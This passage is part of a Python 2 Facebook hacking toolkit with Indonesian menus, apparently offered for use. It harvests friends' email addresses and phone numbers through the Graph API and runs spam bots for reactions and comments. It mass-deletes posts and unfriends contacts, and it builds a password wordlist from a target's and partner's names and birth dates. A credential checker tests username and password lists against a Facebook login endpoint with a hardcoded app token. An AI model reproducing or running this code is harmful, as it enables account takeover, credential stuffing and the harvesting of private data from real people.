print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
